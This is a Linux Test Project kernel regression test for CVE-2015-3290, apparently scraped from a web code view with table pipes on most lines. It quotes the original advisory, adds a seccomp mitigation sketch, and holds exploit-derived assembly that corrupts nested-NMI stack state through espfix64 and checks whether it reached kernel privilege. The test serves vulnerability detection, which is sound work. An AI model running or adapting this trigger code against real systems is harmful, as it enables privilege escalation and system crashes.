| // SPDX-License-Identifier: GPL-2.0-or-later |
| /* |
| * Copyright (c) 2017 Pavel Boldin <pboldin@cloudlinux.com> |
| * Copyright (c) 2018-2022 Linux Test Project |
| */ |
| |
| /* |
| |
NOTE: rather than checking for full nested NMI exploitation, we simply check
that the NMI stack state can be corrupted with this code.
| |
| http://www.openwall.com/lists/oss-security/2015/08/04/8 |
| |
| > +++++ CVE-2015-3290 +++++ |
| > |
> High impact NMI bug on x86_64 systems 3.13 and newer, embargoed. Also
> fixed by:
| > |
| > https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=9b6e6a8334d56354853f9c255d1395c2ba570e0a |
| > |
| > The other fix (synchronous modify_ldt) does *not* fix CVE-2015-3290. |
| > |
| > You can mitigate CVE-2015-3290 by blocking modify_ldt or |
| > perf_event_open using seccomp. A fully-functional, portable, reliable |
| > exploit is privately available and will be published in a week or two. |
| > *Patch your systems* |
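
NOTE (LTP): as a rough illustration of the seccomp mitigation mentioned
above, a process could install a filter like the sketch below before
running untrusted code. This is a hypothetical, minimal example (no
seccomp_data->arch check; modify_ldt and perf_event_open simply fail
with EPERM), not part of this test:

    #include <errno.h>
    #include <stddef.h>
    #include <sys/prctl.h>
    #include <sys/syscall.h>
    #include <linux/filter.h>
    #include <linux/seccomp.h>

    static int deny_ldt_and_perf(void)
    {
        struct sock_filter filter[] = {
            // Load the syscall number.
            BPF_STMT(BPF_LD | BPF_W | BPF_ABS,
                     offsetof(struct seccomp_data, nr)),
            // Fail the two syscalls the exploit needs.
            BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_modify_ldt, 2, 0),
            BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_perf_event_open, 1, 0),
            BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
            BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | EPERM),
        };
        struct sock_fprog prog = {
            .len = (unsigned short)(sizeof(filter) / sizeof(filter[0])),
            .filter = filter,
        };

        // Required so an unprivileged process may install the filter.
        if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0))
            return -1;
        return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog);
    }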
| |
| And here's a real advisory: |
| |
| If an NMI returns via espfix64 and is interrupted during espfix64 setup |
| by another NMI, the return state is corrupt. This is exploitable for |
| reliable privilege escalation on any Linux x86_64 system in which |
| untrusted code can arrange for espfix64 to be invoked and for NMIs to be |
| nested. |
| |
| Glossing over a lot of details, the basic structure of Linux' nested NMI |
| handling is: |
| |
| nmi_handler: |
| if (in_nmi) { |
| nmi_latched = true; |
| return; |
| } |
| in_nmi = true; |
| handle the nmi; |
| atomically (this is magic): |
| if (nmi_latched) { |
| nmi_latched = false; |
| start over; |
| } else { |
| in_nmi = false; |
| return and unmask NMIs; |
| } |
| |
| Alas, on x86_64, there is no reasonable way to block NMIs to run the |
| atomic part of that pseudocode atomically. Instead, the entire atomic |
| piece is implemented by the single instruction IRET. |
| |
| But x86_64 is more broken than just that. The IRET instruction does not |
| restore register state correctly [1] when returning to a 16-bit stack |
| segment. x86_64 has a complicated workaround called espfix64. If |
| espfix64 is invoked on return, a well-behaved IRET is emulated by a |
| complicated scheme that involves manually switching stacks. During the |
| stack switch, there is a window of approximately 19 instructions between |
| the start of espfix64's access to the original stack and when espfix64 |
| is done with the original stack. If a nested NMI occurs during this |
| window, then the atomic part of the basic nested NMI algorithm is |
| observably non-atomic. |
| |
| Depending on exactly where in this window the nested NMI hits, the |
| results vary. Most nested NMIs will corrupt the return context and |
| crash the calling process. Some are harmless except that the nested NMI |
| gets ignored. There is a two-instruction window in which the return |
| context ends up with user-controlled RIP and CS set to __KERNEL_CS. |
| |
| A careful exploit (attached) can recover from all the crashy failures |
| and can regenerate a valid *privileged* state if a nested NMI occurs |
| during the two-instruction window. This exploit appears to work |
| reasonably quickly across a fairly wide range of Linux versions. |
| |
| If you have SMEP, this exploit is likely to panic the system. Writing |
| a usable exploit against a SMEP system would be considerably more |
| challenging, but it's surely possible. |
| |
| Measures like UDEREF are unlikely to help, because this bug is outside |
| any region that can be protected using paging or segmentation tricks. |
| However, recent grsecurity kernels seem to forcibly disable espfix64, so |
| they're not vulnerable in the first place. |
| |
| A couple of notes: |
| |
| - This exploit's payload just prints the text "CPL0". The exploit |
| will keep going after printing CPL0 so you can enjoy seeing the |
| frequency with which it wins. Interested parties could easily |
| write different payloads. I doubt that any existing exploit |
| mitigation techniques would be useful against this type of |
| attack. |
| |
| - If you are using a kernel older than v4.1, a 64-bit build of the |
| exploit will trigger a signal handling bug and crash. Defenders |
   should not rejoice, because the exploit works fine when built
| as a 32-bit binary or (so I'm told) as an x32 binary. |
| |
| - This is the first exploit I've ever written that contains genuine |
| hexadecimal code. The more assembly-minded among you can have |
| fun figuring out why :) |
| |
| [1] By "correctly", I mean that the register state ends up different |
| from that which was saved in the stack frame, not that the |
| implementation doesn't match the spec in the microcode author's minds. |
| The spec is simply broken (differently on AMD and Intel hardware, |
| perhaps unsurprisingly.) |
| |
| --Andy |
| */ |
| |
| #include "config.h" |
| #include "tst_test.h" |
| #include "tst_timer.h" |
| |
| #if defined(__x86_64__) || defined(__i386__) |
| |
| #include <stdlib.h> |
| #include <stdio.h> |
| #include <inttypes.h> |
| #include <asm/ldt.h> |
| #include <unistd.h> |
| #include <sys/syscall.h> |
| #include <setjmp.h> |
| #include <signal.h> |
| #include <string.h> |
| #include <sys/wait.h> |
| #include <linux/perf_event.h> |
| |
| #include "lapi/syscalls.h" |
| #include "tst_safe_pthread.h" |
| |
| /* Abstractions for some 32-bit vs 64-bit differences. */ |
| #ifdef __x86_64__ |
| # define REG_IP REG_RIP |
| # define REG_SP REG_RSP |
| # define REG_AX REG_RAX |
| |
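/*
 * On x86_64 the kernel packs the cs, gs, fs and ss selectors into the
 * single 64-bit REG_CSGSFS greg; this struct is overlaid on it to
 * address them individually.
 */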
| struct selectors { |
| unsigned short cs, gs, fs, ss; |
| }; |
| |
| LTP_ATTRIBUTE_UNUSED |
| static unsigned short *ssptr(ucontext_t *ctx) |
| { |
| struct selectors *sels = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS]; |
| return &sels->ss; |
| } |
| |
| LTP_ATTRIBUTE_UNUSED |
| static unsigned short *csptr(ucontext_t *ctx) |
| { |
| struct selectors *sels = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS]; |
| return &sels->cs; |
| } |
| #else |
| # define REG_IP REG_EIP |
| # define REG_SP REG_ESP |
| # define REG_AX REG_EAX |
| # define REG_CR2 (REG_SS + 3) |
| |
| LTP_ATTRIBUTE_UNUSED |
| static greg_t *ssptr(ucontext_t *ctx) |
| { |
| return &ctx->uc_mcontext.gregs[REG_SS]; |
| } |
| |
| LTP_ATTRIBUTE_UNUSED |
| static greg_t *csptr(ucontext_t *ctx) |
| { |
| return &ctx->uc_mcontext.gregs[REG_CS]; |
| } |
| #endif |
| |
| static volatile long expected_rsp; |
| static int running = 1; |
| |
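/*
 * Install a 16-bit data segment as LDT entry 0. Loading SS with the
 * matching selector (0x7: index 0, TI=LDT, RPL=3) later is what forces
 * IRET through the espfix64 path described above.
 */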
| static void set_ldt(void) |
| { |
| /* Boring 16-bit data segment. */ |
| const struct user_desc data_desc = { |
| .entry_number = 0, |
| .base_addr = 0, |
| .limit = 0xfffff, |
| .seg_32bit = 0, |
| .contents = 0, /* Data, expand-up */ |
| .read_exec_only = 0, |
| .limit_in_pages = 0, |
| .seg_not_present = 0, |
| .useable = 0 |
| }; |
| |
| TEST((int)tst_syscall(__NR_modify_ldt, 1, &data_desc, |
| sizeof(data_desc))); |
	if (TST_RET == -1 && TST_ERR == EINVAL) {
| tst_brk(TCONF | TRERRNO, |
| "modify_ldt: 16-bit data segments are probably disabled"); |
| } else if (TST_RET != 0) { |
| tst_brk(TBROK | TRERRNO, "modify_ldt"); |
| } |
| } |
| |
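/*
 * Run for a while with SS set to the 16-bit LDT selector. Any NMI that
 * arrives in that window must return through espfix64, so on a
 * vulnerable kernel a nested NMI can leave corrupted return state
 * behind. If we ever find ourselves at CPL0, SYSRET straight back to
 * user mode; otherwise restore the original SS and trap with int3 if
 * IF was lost or SS no longer reads back as expected.
 */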
| static void try_corrupt_stack(unsigned short orig_ss) |
| { |
| #ifdef __x86_64__ |
| asm volatile ( |
| /* A small puzzle for the curious reader. */ |
| "mov $2048, %%rbp \n\t" |
| |
| /* Save rsp for diagnostics */ |
| "mov %%rsp, %[expected_rsp] \n\t" |
| |
| /* |
| * Let 'er rip. |
| */ |
| "mov %[ss], %%ss \n\t" /* begin corruption */ |
| "movl $1000, %%edx \n\t" |
| "1: decl %%edx \n\t" |
| "jnz 1b \n\t" |
| "mov %%ss, %%eax \n\t" /* grab SS to display */ |
| |
| /* Did we enter CPL0? */ |
| "mov %%cs, %%dx \n\t" |
| "testw $3, %%dx \n\t" |
| "jnz 2f \n\t" |
| "leaq 3f(%%rip), %%rcx \n\t" |
| "movl $0x200, %%r11d \n\t" |
| "sysretq \n\t" |
| "2: \n\t" |
| |
| /* |
| * Stop further corruption. We need to check CPL |
| * first because we need RPL == CPL. |
| */ |
| "mov %[orig_ss], %%ss \n\t" /* end corruption */ |
| |
| "subq $128, %%rsp \n\t" |
| "pushfq \n\t" |
| "testl $(1<<9),(%%rsp) \n\t" |
| "addq $136, %%rsp \n\t" |
| "jz 3f \n\t" |
| "cmpl %[ss], %%eax \n\t" |
| "je 4f \n\t" |
| "3: int3 \n\t" |
| "4: \n\t" |
| : [expected_rsp] "=m" (expected_rsp) |
| : [ss] "r" (0x7), [orig_ss] "m" (orig_ss) |
| : "rax", "rcx", "rdx", "rbp", "r11", "flags" |
| ); |
| #else |
| asm volatile ( |
| /* A small puzzle for the curious reader. */ |
| "mov %%ebp, %%esi \n\t" |
| "mov $2048, %%ebp \n\t" |
| |
		/* Save esp for diagnostics */
| "mov %%esp, %[expected_rsp] \n\t" |
| |
| /* |
| * Let 'er rip. |
| */ |
| "mov %[ss], %%ss \n\t" /* begin corruption */ |
| "movl $1000, %%edx \n\t" |
| "1: .byte 0xff, 0xca \n\t" /* decl %edx */ |
| "jnz 1b \n\t" |
| "mov %%ss, %%eax \n\t" /* grab SS to display */ |
| |
| /* Did we enter CPL0? */ |
| "mov %%cs, %%dx \n\t" |
| "testw $3, %%dx \n\t" |
| "jnz 2f \n\t" |
| ".code64 \n\t" |
| "leaq 3f(%%rip), %%rcx \n\t" |
| "movl $0x200, %%r11d \n\t" |
| "sysretl \n\t" |
| ".code32 \n\t" |
| "2: \n\t" |
| |
| /* |
| * Stop further corruption. We need to check CPL |
| * first because we need RPL == CPL. |
| */ |
| "mov %[orig_ss], %%ss \n\t" /* end corruption */ |
| |
| "pushf \n\t" |
| "testl $(1<<9),(%%esp) \n\t" |
| "addl $4, %%esp \n\t" |
| "jz 3f \n\t" |
| "cmpl %[ss], %%eax \n\t" |
| "je 4f \n\t" |
| "3: int3 \n\t" |
| "4: mov %%esi, %%ebp \n\t" |
| : [expected_rsp] "=m" (expected_rsp) |
| : [ss] "r" (0x7), [orig_ss] "m" (orig_ss) |
| : "eax", "ecx", "edx", "esi", "flags" |
| ); |
| #endif |
| } |
| |
static int perf_event_open(struct perf_event_attr *hw_event, pid_t pid,
	int cpu, int group_fd, unsigned long flags)
{
	return tst_syscall(__NR_perf_event_open, hw_event, pid, cpu,
		group_fd, flags);
}
| |
| static int event_mlock_kb; |
| static int max_sample_rate; |
| |
| static void *child_thread(void *arg LTP_ATTRIBUTE_UNUSED) |
| { |
| long niter = 0; |
| unsigned short orig_ss; |
| |
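	/*
	 * Sample two hardware events at high frequency: on x86 the PMU
	 * delivers its overflow interrupts as NMIs, so this keeps NMIs
	 * firing on every CPU while try_corrupt_stack() spins.
	 */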
| struct perf_event_attr pe = { |
| .size = sizeof(struct perf_event_attr), |
| .disabled = 0, |
| .exclude_kernel = 0, |
| .exclude_hv = 0, |
| .freq = 1, |
| .sample_type = PERF_SAMPLE_IP|PERF_SAMPLE_TID| |
| PERF_SAMPLE_TIME|PERF_SAMPLE_CALLCHAIN| |
| PERF_SAMPLE_ID|PERF_SAMPLE_PERIOD, |
| }; |
	/*
	 * sample_freq lives in a union in struct perf_event_attr; set it
	 * after the initializer to work around a bug in GCC 4.4.7
	 * (CentOS 6).
	 */
| pe.sample_freq = max_sample_rate / 5; |
| |
| struct { |
| uint32_t type; |
| uint64_t config; |
| const char *name; |
| } perf_events[] = { |
| { |
| .type = PERF_TYPE_HARDWARE, |
| .config = PERF_COUNT_HW_INSTRUCTIONS, |
| .name = "hw instructions", |
| }, |
| { |
| .type = PERF_TYPE_HARDWARE, |
| .config = PERF_COUNT_HW_CACHE_REFERENCES, |
| .name = "hw cache references", |
| }, |
| }; |
| |
| void *perf_mmaps[ARRAY_SIZE(perf_events)]; |
| unsigned int i; |
| |
| for (i = 0; i < ARRAY_SIZE(perf_events); i++) { |
| int fd; |
| |
| pe.type = perf_events[i].type; |
| pe.config = perf_events[i].config; |
| |
| fd = perf_event_open(&pe, 0, -1, -1, 0); |
| if (fd == -1) { |
| if (errno == EINVAL || errno == ENOENT || |
| errno == EBUSY) |
| tst_brk(TCONF | TERRNO, |
| "no hardware counters"); |
| else |
| tst_brk(TBROK | TERRNO, "perf_event_open"); |
| /* tst_brk exits */ |
| } |
| |
| perf_mmaps[i] = SAFE_MMAP(NULL, event_mlock_kb * 1024, |
| PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0); |
| SAFE_CLOSE(fd); |
| } |
| |
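	/* Remember the sane SS value so try_corrupt_stack() can restore it. */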
| asm volatile ("mov %%ss, %0" : "=rm" (orig_ss)); |
| |
| for (niter = 0; running && niter < 1000*1000*1000L; niter++) { |
| |
| try_corrupt_stack(orig_ss); |
| |
| /* |
| * If we ended up with IF == 0, there's no easy way to fix |
| * it. Instead, make frequent syscalls to avoid hanging |
| * the system. |
| */ |
| syscall(0x3fffffff); |
| } |
| |
| for (i = 0; i < ARRAY_SIZE(perf_events); i++) |
| if (perf_mmaps[i] != MAP_FAILED) |
			SAFE_MUNMAP(perf_mmaps[i], event_mlock_kb * 1024);
| |
| return (void *)niter; |
| } |
| |
| static void do_child(void) |
| { |
| int i, ncpus; |
| pthread_t *threads; |
| long iter, total_iter = 0; |
| |
| tst_res(TINFO, "attempting to corrupt nested NMI stack state"); |
| |
| set_ldt(); |
| |
| ncpus = tst_ncpus(); |
| threads = SAFE_MALLOC(sizeof(*threads) * ncpus); |
| |
| for (i = 0; i < ncpus; i++) |
| SAFE_PTHREAD_CREATE(&threads[i], NULL, child_thread, NULL); |
| |
| sleep(tst_remaining_runtime()); |
| running = 0; |
| |
| for (i = 0; i < ncpus; i++) { |
| SAFE_PTHREAD_JOIN(threads[i], (void **)&iter); |
| total_iter += iter; |
| } |
| free(threads); |
| |
| tst_res(TPASS, "can't corrupt nested NMI state after %ld iterations", |
| total_iter); |
| } |
| |
| static void setup(void) |
| { |
| /* |
| * According to perf_event_open's manpage, the official way of |
| * knowing if perf_event_open() support is enabled is checking for |
| * the existence of the file /proc/sys/kernel/perf_event_paranoid. |
| */ |
| if (access("/proc/sys/kernel/perf_event_paranoid", F_OK) == -1) |
| tst_brk(TCONF, "Kernel doesn't have perf_event support"); |
| |
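	/*
	 * The ring-buffer mmaps in child_thread() are sized to the
	 * per-user perf mlock allowance, and the sample frequency is kept
	 * well below the system-wide limit, so that neither mmap() nor
	 * perf_event_open() fails for resource reasons.
	 */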
| SAFE_FILE_SCANF("/proc/sys/kernel/perf_event_mlock_kb", |
| "%d", &event_mlock_kb); |
| SAFE_FILE_SCANF("/proc/sys/kernel/perf_event_max_sample_rate", |
| "%d", &max_sample_rate); |
| } |
| |
| static void run(void) |
| { |
| pid_t pid; |
| int status; |
| |
| pid = SAFE_FORK(); |
| if (pid == 0) { |
| do_child(); |
| return; |
| } |
| |
| SAFE_WAITPID(pid, &status, 0); |
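
	/*
	 * A child killed by SIGSEGV means a nested NMI hit the espfix64
	 * window and corrupted the return state: the kernel is vulnerable.
	 */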
| if (WIFSIGNALED(status) && WTERMSIG(status) == SIGSEGV) |
| tst_res(TFAIL, "corrupted NMI stack"); |
| else if (WIFEXITED(status) && WEXITSTATUS(status) != 0) |
		tst_res(WEXITSTATUS(status), "Propagate child status");
| } |
| |
| static struct tst_test test = { |
| .forks_child = 1, |
| .needs_root = 1, |
| .setup = setup, |
| .max_runtime = 180, |
| .test_all = run, |
| .tags = (const struct tst_tag[]) { |
| {"linux-git", "9b6e6a8334d5"}, |
| {"CVE", "2015-3290"}, |
| {} |
| } |
| }; |
| |
| #else /* defined(__x86_64__) || defined(__i386__) */ |
| |
| TST_TEST_TCONF("not (i386 or x86_64)"); |
| |
| #endif |